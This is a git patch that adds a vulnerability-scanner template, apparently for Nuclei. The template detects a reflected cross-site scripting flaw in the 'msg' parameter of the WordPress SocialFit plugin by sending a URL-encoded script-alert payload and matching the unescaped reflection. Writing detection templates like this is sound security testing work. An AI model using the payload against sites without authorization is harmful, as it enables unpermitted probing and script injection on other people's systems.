From d0ec1acc7682195a65b3c3248c3b0d642baf48e7 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sun, 11 Jul 2021 07:41:04 +0700
Subject: [PATCH] Create wp-socialfit-xss.yaml

---
 .../wordpress/wp-socialfit-xss.yaml           | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 vulnerabilities/wordpress/wp-socialfit-xss.yaml

diff --git a/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/vulnerabilities/wordpress/wp-socialfit-xss.yaml
new file mode 100644
index 0000000000..c91895ce84
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-socialfit-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-socialfit-xss
+
+info:
+  name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: |
+    SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  reference: |
+    - https://www.exploit-db.com/exploits/37481
+  tags: wordpress,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(1)</script>'
+      - type: word
+        part: header
+        words:
+          - "text/html"
+      - type: status
+        status:
+          - 200